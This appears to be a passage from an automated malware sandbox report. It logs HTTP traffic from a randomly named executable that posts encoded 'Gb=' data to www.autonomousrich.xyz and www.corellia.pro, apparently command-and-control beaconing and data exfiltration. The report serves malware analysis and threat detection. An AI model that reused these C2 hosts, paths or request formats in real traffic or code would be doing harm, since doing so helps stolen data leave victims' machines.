                                                                                                    Data Ascii: Gb=rxirpgosGTOmm1CkREhwJF3TlGiF3eLO3YaYljUUkXfoSLFGsjVrG2skCYRM+U1TzJp4zxvFTyBW3VTdo2Zg/IktS3xt3oKUNAdvdHxY5zFogXvP0SFs1ihxMrvNftoq6RhQpDJIfCF7u358LTxZ4CeusL97wc+yoWYxQGOMoC2WFjOSNbOer6Udfdw5gxktZA==
                                                                                                    Jan 22, 2025 07:52:47.020558119 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                    content-length: 0
                                                                                                    connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.45002213.248.169.48803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:49.098292112 CET704OUTPOST /5l58/ HTTP/1.1
                                                                                                    Host: www.autonomousrich.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.autonomousrich.xyz
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 219
                                                                                                    Connection: close
                                                                                                    Referer: http://www.autonomousrich.xyz/5l58/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 72 78 69 72 70 67 6f 73 47 54 4f 6d 30 46 79 6b 51 6a 31 77 65 31 33 63 72 6d 69 46 74 75 4c 4b 33 59 57 59 6c 6d 73 45 6b 69 76 6f 54 70 64 47 32 68 39 72 46 32 73 6b 61 6f 52 4a 78 30 31 4d 7a 4a 73 4e 7a 30 50 46 54 32 68 57 33 55 6a 64 72 48 5a 68 2b 59 6b 6a 66 58 78 76 6f 34 4b 55 4e 41 64 76 64 45 4e 79 35 79 74 6f 67 43 2f 50 31 7a 46 76 72 79 68 79 61 37 76 4e 62 74 6f 6d 36 52 68 32 70 42 38 74 66 41 4e 37 75 32 4a 38 4c 69 78 59 32 43 66 6c 69 72 39 73 38 63 33 41 78 32 51 34 58 6d 54 69 67 44 53 42 4a 46 44 49 63 71 76 4a 35 36 77 75 43 61 35 4e 74 79 5a 6b 43 43 74 36 61 7a 33 38 74 73 32 37 51 35 68 79 35 66 49 63 46 33 63 3d
                                                                                                    Data Ascii: Gb=rxirpgosGTOm0FykQj1we13crmiFtuLK3YWYlmsEkivoTpdG2h9rF2skaoRJx01MzJsNz0PFT2hW3UjdrHZh+YkjfXxvo4KUNAdvdENy5ytogC/P1zFvryhya7vNbtom6Rh2pB8tfAN7u2J8LixY2Cflir9s8c3Ax2Q4XmTigDSBJFDIcqvJ56wuCa5NtyZkCCt6az38ts27Q5hy5fIcF3c=
                                                                                                    Jan 22, 2025 07:52:49.565347910 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                    content-length: 0
                                                                                                    connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.45002313.248.169.48803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:51.646295071 CET10786OUTPOST /5l58/ HTTP/1.1
                                                                                                    Host: www.autonomousrich.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.autonomousrich.xyz
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 10299
                                                                                                    Connection: close
                                                                                                    Referer: http://www.autonomousrich.xyz/5l58/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 72 78 69 72 70 67 6f 73 47 54 4f 6d 30 46 79 6b 51 6a 31 77 65 31 33 63 72 6d 69 46 74 75 4c 4b 33 59 57 59 6c 6d 73 45 6b 69 6e 6f 54 63 42 47 31 47 68 72 45 32 73 6b 45 59 52 49 78 30 31 46 7a 50 45 42 7a 30 4b 79 54 30 5a 57 33 79 2f 64 71 31 78 68 78 59 6b 6a 57 33 78 73 33 6f 4b 37 4e 41 4e 72 64 45 64 79 35 79 74 6f 67 44 50 50 68 53 46 76 70 79 68 78 4d 72 76 37 66 74 70 35 36 52 6f 4e 70 42 6f 58 66 52 74 37 74 57 5a 38 4a 30 74 59 2b 43 66 6e 68 72 38 70 38 63 72 62 78 32 4e 42 58 6c 4f 35 67 41 4f 42 5a 54 75 41 59 6f 6a 2b 6c 71 41 51 64 74 64 38 30 52 68 58 41 6a 78 41 66 52 66 4a 2f 2b 36 51 54 4a 34 70 37 74 34 57 51 54 72 68 65 2f 68 59 42 53 55 6f 73 54 56 68 51 37 64 72 59 43 70 68 6e 63 49 55 58 4e 2f 45 43 51 6f 6a 53 2f 4a 64 37 42 55 69 39 38 77 62 75 63 59 33 51 7a 46 51 37 38 44 56 36 56 36 63 77 6f 41 52 65 46 48 4c 31 33 6e 79 51 58 4f 57 76 62 6f 39 68 78 45 59 5a 6c 69 64 43 39 58 72 62 67 4a 35 35 47 65 41 50 30 64 79 73 72 6c 41 33 74 51 64 6b 72 57 2b 70 58 6e [TRUNCATED]
                                                                                                    Data Ascii: Gb=rxirpgosGTOm0FykQj1we13crmiFtuLK3YWYlmsEkinoTcBG1GhrE2skEYRIx01FzPEBz0KyT0ZW3y/dq1xhxYkjW3xs3oK7NANrdEdy5ytogDPPhSFvpyhxMrv7ftp56RoNpBoXfRt7tWZ8J0tY+Cfnhr8p8crbx2NBXlO5gAOBZTuAYoj+lqAQdtd80RhXAjxAfRfJ/+6QTJ4p7t4WQTrhe/hYBSUosTVhQ7drYCphncIUXN/ECQojS/Jd7BUi98wbucY3QzFQ78DV6V6cwoAReFHL13nyQXOWvbo9hxEYZlidC9XrbgJ55GeAP0dysrlA3tQdkrW+pXnU1Ev2uIC//MYUSyE9F2OFd9iAopZ1uzPI5AUpcm/vkTC+HdKSB/3c3UB3Qb5+tIsZFgTKwqu7ddyilANyPerCkyb1gfBfdZ+VlWmwwQnAeRAT7qNeysOXV+0sGbH7sEfBYWM2HfhVDHBpsaUanr8M/cCm+3YZqj18bLDmivzWgD2vDRdj1vAegKI5nFmxM/0z6dfx8C0m7J8CfzcedvyqgZ+J956zWCsneYp0hmmjnqAt0lTq8Ud+yC9Xc31xVIbvK+nLdI/557hoVLdL4u+eIdRlhIgaMu1/US1GokxQ/yi+Byt0LfJzfcw6L/fcjioxw7ESkzcsNa4ohpVxpjL/BhhckliOtA9jRECacyCDASsaCjrWAZKaueqtezJX2df6XnDu3pyQyLUaFDFlscohORX0AYclHWSoVSR8RGtSiYFfIhlkbeR9iTAb7gM3KAQjALhTSffz5HmGdPce6iXId0NrDsXfGlUI0OB/t6lvwXs3rsU7KXZ9QZjePPb6hbAM7oixE1oK42+HPfDjVBQVlhtIuKeowOmPQI/fKk76wCPuNq6quCR1G1xIM5Y/k2iu5dYUv7pZa7K8Ey/kdpSgFnAIcIskip+r0b6sblASbVMMce/MTrY7YQB90PBl0DzfgYaLY7MLrOlm7DfxrXk4uJDcgqbIAuoEl [TRUNCATED]
                                                                                                    Jan 22, 2025 07:52:52.090219975 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                    content-length: 0
                                                                                                    connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.45002413.248.169.48803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:54.184541941 CET408OUTGET /5l58/?Gb=mzKLqUgWNSOc0HCmYD0eZB35mXOvxurDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy77YqYU9tnNrtZSFWdn4ViixqxAzw7XlvsxQ=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.autonomousrich.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:52:54.672789097 CET376INHTTP/1.1 200 OK
                                                                                                    content-type: text/html
                                                                                                    date: Wed, 22 Jan 2025 06:52:54 GMT
                                                                                                    content-length: 255
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 62 3d 6d 7a 4b 4c 71 55 67 57 4e 53 4f 63 30 48 43 6d 59 44 30 65 5a 42 33 35 6d 58 4f 76 78 75 72 44 7a 4b 4c 4f 37 69 6b 74 71 53 69 31 65 38 56 49 6f 47 68 72 4c 51 38 30 59 4a 6f 54 32 55 4a 79 36 5a 64 61 78 43 32 77 55 33 78 35 38 56 44 77 73 6a 77 79 37 37 59 71 59 55 39 74 6e 4e 72 74 5a 53 46 57 64 6e 34 56 69 69 78 71 78 41 7a 77 37 58 6c 76 73 78 51 3d 26 63 38 68 34 30 3d 71 38 73 78 38 70 55 58 36 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gb=mzKLqUgWNSOc0HCmYD0eZB35mXOvxurDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy77YqYU9tnNrtZSFWdn4ViixqxAzw7XlvsxQ=&c8h40=q8sx8pUX60"}</script></head></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.450025217.160.0.90803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:59.872046947 CET666OUTPOST /eee1/ HTTP/1.1
                                                                                                    Host: www.corellia.pro
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.corellia.pro
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 199
                                                                                                    Connection: close
                                                                                                    Referer: http://www.corellia.pro/eee1/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 71 2f 4d 75 2b 68 6d 49 4e 4c 30 7a 4c 30 31 73 35 7a 45 63 71 71 4c 6c 2f 66 74 37 67 2b 41 5a 4a 2f 6d 67 39 31 56 51 4b 75 53 41 37 53 43 4c 73 32 45 62 32 6c 33 4f 31 38 61 49 6c 38 78 2b 78 52 4a 58 76 57 6d 64 4d 6b 6c 6f 64 72 6e 62 78 54 48 47 32 52 69 49 70 6b 59 76 31 39 68 66 67 77 2f 46 76 46 59 6c 44 46 34 48 75 77 63 50 33 38 78 38 76 62 6b 59 35 65 5a 70 4b 52 39 32 38 6d 49 33 7a 36 6e 48 6e 75 76 49 56 61 37 48 4e 53 32 5a 64 4b 65 68 53 32 6a 30 6e 37 79 36 33 53 57 6b 75 4d 6e 79 66 77 71 4b 47 75 2b 71 6c 37 6d 30 64 49 46 7a 69 53 42 64 44 75 31 4e 2f 41 3d 3d
                                                                                                    Data Ascii: Gb=q/Mu+hmINL0zL01s5zEcqqLl/ft7g+AZJ/mg91VQKuSA7SCLs2Eb2l3O18aIl8x+xRJXvWmdMklodrnbxTHG2RiIpkYv19hfgw/FvFYlDF4HuwcP38x8vbkY5eZpKR928mI3z6nHnuvIVa7HNS2ZdKehS2j0n7y63SWkuMnyfwqKGu+ql7m0dIFziSBdDu1N/A==
                                                                                                    Jan 22, 2025 07:53:00.520492077 CET681INHTTP/1.1 404 Not Found
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Date: Wed, 22 Jan 2025 06:53:00 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 [TRUNCATED]
                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.450026217.160.0.90803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:53:02.502089024 CET686OUTPOST /eee1/ HTTP/1.1
                                                                                                    Host: www.corellia.pro
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.corellia.pro
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 219
                                                                                                    Connection: close
                                                                                                    Referer: http://www.corellia.pro/eee1/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 71 2f 4d 75 2b 68 6d 49 4e 4c 30 7a 5a 6b 6c 73 38 53 45 63 39 61 4c 71 77 2f 74 37 72 65 41 64 4a 2f 69 67 39 77 6b 58 4b 63 32 41 36 7a 79 4c 72 30 38 62 31 6c 33 4f 37 63 61 4e 6f 63 78 50 78 52 46 68 76 54 6d 64 4d 6b 68 6f 64 71 58 62 78 69 48 48 32 42 69 4b 69 45 59 68 6f 4e 68 66 67 77 2f 46 76 46 4d 50 44 46 67 48 75 6a 45 50 6d 74 78 37 6d 37 6b 66 78 2b 5a 70 4f 52 38 65 38 6d 4a 61 7a 2f 47 69 6e 73 6e 49 56 66 2f 48 4b 44 32 57 53 4b 66 6b 66 57 69 36 6f 4b 4c 53 75 58 6e 70 6c 4f 6e 70 51 54 47 4f 48 6f 7a 77 30 4b 48 6a 50 49 68 41 2f 56 49 70 4f 74 49 45 6b 50 73 74 30 2b 76 73 74 6d 74 64 33 45 61 4a 30 50 41 63 63 6d 49 3d
                                                                                                    Data Ascii: Gb=q/Mu+hmINL0zZkls8SEc9aLqw/t7reAdJ/ig9wkXKc2A6zyLr08b1l3O7caNocxPxRFhvTmdMkhodqXbxiHH2BiKiEYhoNhfgw/FvFMPDFgHujEPmtx7m7kfx+ZpOR8e8mJaz/GinsnIVf/HKD2WSKfkfWi6oKLSuXnplOnpQTGOHozw0KHjPIhA/VIpOtIEkPst0+vstmtd3EaJ0PAccmI=
                                                                                                    Jan 22, 2025 07:53:03.135962963 CET681INHTTP/1.1 404 Not Found
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Date: Wed, 22 Jan 2025 06:53:03 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 [TRUNCATED]
                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    19192.168.2.450027217.160.0.9080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:53:05.566499949 CET10768OUTPOST /eee1/ HTTP/1.1
                                                                                                    Host: www.corellia.pro
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.corellia.pro
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 10299
                                                                                                    Connection: close
                                                                                                    Referer: http://www.corellia.pro/eee1/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 71 2f 4d 75 2b 68 6d 49 4e 4c 30 7a 5a 6b 6c 73 38 53 45 63 39 61 4c 71 77 2f 74 37 72 65 41 64 4a 2f 69 67 39 77 6b 58 4b 63 2b 41 37 46 75 4c 74 56 38 62 30 6c 33 4f 6c 4d 61 4d 6f 63 78 57 78 52 64 39 76 54 69 6e 4d 6d 70 6f 50 39 2f 62 7a 57 62 48 39 42 69 4b 74 6b 59 67 31 39 68 77 67 77 75 74 76 46 63 50 44 46 67 48 75 6b 38 50 6d 38 78 37 67 37 6b 59 35 65 5a 31 4b 52 38 6c 38 6c 34 76 7a 2f 4b 63 6e 59 54 49 56 2f 76 48 49 78 65 57 62 4b 66 71 54 32 6a 6e 6f 4c 33 4e 75 57 50 50 6c 50 44 58 51 51 61 4f 47 74 4b 63 68 4b 50 66 56 66 5a 64 73 69 34 4d 44 74 41 6a 67 4d 38 7a 31 74 2b 77 32 31 52 49 32 33 37 67 76 73 51 63 50 57 33 49 52 74 33 54 68 75 45 70 74 69 62 76 46 4e 6a 36 49 6a 47 41 70 67 4c 34 69 2f 38 6e 46 66 4f 50 71 62 63 52 6b 42 36 6a 62 6f 70 65 4d 33 4f 56 54 69 72 73 42 67 69 72 4a 6a 39 4e 33 54 53 53 45 30 68 54 37 79 2b 4d 77 37 77 56 36 52 45 55 57 36 7a 37 62 6d 62 71 78 38 70 66 54 53 66 4c 42 46 47 73 4c 2b 59 57 50 31 6a 2b 77 57 45 46 4b 69 6b 62 68 79 58 [TRUNCATED]
                                                                                                    Data Ascii: Gb=q/Mu+hmINL0zZkls8SEc9aLqw/t7reAdJ/ig9wkXKc+A7FuLtV8b0l3OlMaMocxWxRd9vTinMmpoP9/bzWbH9BiKtkYg19hwgwutvFcPDFgHuk8Pm8x7g7kY5eZ1KR8l8l4vz/KcnYTIV/vHIxeWbKfqT2jnoL3NuWPPlPDXQQaOGtKchKPfVfZdsi4MDtAjgM8z1t+w21RI237gvsQcPW3IRt3ThuEptibvFNj6IjGApgL4i/8nFfOPqbcRkB6jbopeM3OVTirsBgirJj9N3TSSE0hT7y+Mw7wV6REUW6z7bmbqx8pfTSfLBFGsL+YWP1j+wWEFKikbhyXttByicqkp3o7nPRMM5TumsfiRYbSkANxc2J9X/Wk7SKZk19HGYb58SJadNIUJNwwO07tKRaMzUEb8nZANUy6lVVrPUmgCMpQVP5W1bMibrUXIh6+L5L5LzMG8Znj8E8edzHQcCjr31zH5A6mYCjcce5/NCH+bB+Z2EYA+i3ltaiHhrzDTsgdRrKe5RFhWYdTc2gn3c3/GBd0F9fA8eszJpHrQvfn6AkO5MyPpeAv+0DyL7Shh1IkaDwpmmlN7c49B8XrAXqkn78mjczeUH5wVKvgdQNG6csAjohFcGCS1r2urcggXJyLY/BA4Dv0CgxATXH6az4i9b4pdiRB4WNr9ZnigTCNdbBW65Qozy/Dqzty0769ikrCYFwGwBkgju1xPf5RblQI5J4h+D49KJskCHLukVUQffvniCyUFEtTN86snzNJax3wLvp9zAbSNEFiZobCT0YuJPQZi0iX+AsmUzJZQEDMBaHx+liB2lJMbrN29mRHP/nPhfeNCDNZ44ZPNdnhcWfwcVppcgnNvBCj23v8YaKnNjUFGCwaEhkwT2GB7GTBvhV+5P9v5aDkMaYjlvANDl5cEOvfLgp4XCUUOZyDLXjAMr14iJs/5eutuC4AkKm9sEAsL+nCiD604ywTLGdJ+MwuvP4JulxTvcfiuERuUDr7BNKaut [TRUNCATED]
                                                                                                    Jan 22, 2025 07:53:06.216166019 CET681INHTTP/1.1 404 Not Found
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Date: Wed, 22 Jan 2025 06:53:06 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 [TRUNCATED]
                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    20192.168.2.450028217.160.0.9080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:53:08.109710932 CET402OUTGET /eee1/?Gb=n9kO9VSsPKocZxgZzQNS6oD/2NdyhckYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+i+/kEtv5fcMwQaiykVTbVos+Dhavap1uoI=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.corellia.pro
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:53:08.757775068 CET981INHTTP/1.1 404 Not Found
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 837
                                                                                                    Connection: close
                                                                                                    Date: Wed, 22 Jan 2025 06:53:08 GMT
                                                                                                    Server: Apache
